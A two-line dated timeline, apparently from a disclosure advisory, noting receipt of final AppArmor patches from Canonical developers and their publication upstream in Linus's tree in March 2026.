2026-03-09: Received a fifth and final version of the patches from Canonical's AppArmor developers.

2026-03-12: The patches are published upstream in Linus's tree.